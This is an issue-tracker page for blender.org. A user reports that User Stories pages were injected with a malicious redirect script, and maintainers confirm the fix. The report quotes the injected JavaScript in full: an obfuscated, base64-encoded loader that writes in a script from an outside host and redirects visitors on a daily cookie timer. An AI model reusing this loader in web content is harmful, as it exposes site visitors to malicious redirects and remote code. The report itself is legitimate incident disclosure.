infrastructure/blender-org
5
4
Fork 1
Code Issues 16 Pull Requests Projects Releases Wiki Activity

Malicious redirect from User Stories on blender.org #74870

New Issue
Closed
opened 2020-03-18 07:11:01 +01:00 by swtch · 7 comments
swtch commented 2020-03-18 07:11:01 +01:00
Copy Link

Short description of error
It seems that some pages on blender.org are infected with a malicious script that redirects to random, potentially dangerous websites. I encountered this problem on user stories pages, e.g. https://www.blender.org/user-stories/title-design-from-wonder-woman-to-xxx/.

I've inspected the page source and it appears that this is the malicious code:

Exact steps for others to reproduce the error

**Short description of error** It seems that some pages on blender.org are infected with a malicious script that redirects to random, potentially dangerous websites. I encountered this problem on user stories pages, e.g. https://www.blender.org/user-stories/title-design-from-wonder-woman-to-xxx/. I've inspected the page source and it appears that this is the malicious code: ```<!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\- [x]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U- [x]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe--> ``` **Exact steps for others to reproduce the error** * If you click on any user story on https://www.blender.org/about/user-stories/, after a seemingly random delay you will be redirected to another page not hosted on blender.org.
swtch commented 2020-03-18 07:11:01 +01:00
Author
Copy Link

Added subscriber: @swtch

Added subscriber: @swtch
swtch commented 2020-03-18 07:13:14 +01:00
Author
Copy Link

It probably will be worth checking if Blender binary releases distributed from blender.org were tampered with.

It probably will be worth checking if Blender binary releases distributed from blender.org were tampered with.
Campbell Barton commented 2020-03-18 07:25:33 +01:00
Copy Link

Added subscriber: @ideasman42

Added subscriber: @ideasman42
Campbell Barton commented 2020-03-18 07:25:33 +01:00
Copy Link

Thanks for letting us know, I've forwarded this to the sysadmin & other admins.

Thanks for letting us know, I've forwarded this to the sysadmin & other admins.
Sergey Sharybin commented 2020-03-18 11:05:54 +01:00
Owner
Copy Link

Added subscriber: @Sergey

Added subscriber: @Sergey
Sergey Sharybin commented 2020-03-18 11:05:54 +01:00
Owner
Copy Link

Changed status from 'Needs Triage' to: 'Resolved'

Changed status from 'Needs Triage' to: 'Resolved'
Sergey Sharybin self-assigned this 2020-03-18 11:05:54 +01:00
Sergey Sharybin commented 2020-03-18 11:05:54 +01:00
Owner
Copy Link

Thanks for the report.

It has been taken care about.
The binaries and other sites were unaffected.

Thanks for the report. It has been taken care about. The binaries and other sites were unaffected.
Sign in to join this conversation.
No Branch/Tag Specified
Branches Tags
Labels
Clear labels   
legacy module
Rendering & Cycles

  
legacy module
User Interface

  
legacy project
Cycles

  
legacy project
Documentation

  
legacy project
Infrastructure: blender.org

  
legacy project
Infrastructure: Blender Web Assets

  
legacy project
Infrastructure: Websites

  
legacy project
User Interface

  
Priority
High

  
Priority
Low

  
Priority
Normal

  
Priority
Unbreak Now!

  
Status
Archived

  
Status
Confirmed

  
Status
Duplicate

  
Status
Needs Triage

  
Status
Resolved

  
Type
Bug

  
Type
Design

  
Type
Known Issue

  
Type
Report

  
Type
To Do

No Label
legacy module
Rendering & Cycles
legacy module
User Interface
legacy project
Cycles
legacy project
Documentation
legacy project
Infrastructure: blender.org
legacy project
Infrastructure: Blender Web Assets
legacy project
Infrastructure: Websites
legacy project
User Interface
Priority
High
Priority
Low
Priority
Normal
Priority
Unbreak Now!
Status
Archived
Status
Confirmed
Status
Duplicate
Status
Needs Triage
Status
Resolved
Type
Bug
Type
Design
Type
Known Issue
Type
Report
Type
To Do
Milestone
Clear milestone
No items
No Milestone
Projects
Clear projects
No project
Assignees
Clear assignees
No Assignees
Sergey Sharybin
3 Participants
Notifications
Due Date
The due date is invalid or out of range. Please use the format 'yyyy-mm-dd'.

No due date set.

Dependencies

No dependencies set.

Reference: infrastructure/blender-org#74870
No description provided.
Delete Branch "%!s()"

Deleting a branch is permanent. Although the deleted branch may continue to exist for a short time before it actually gets removed, it CANNOT be undone in most cases. Continue?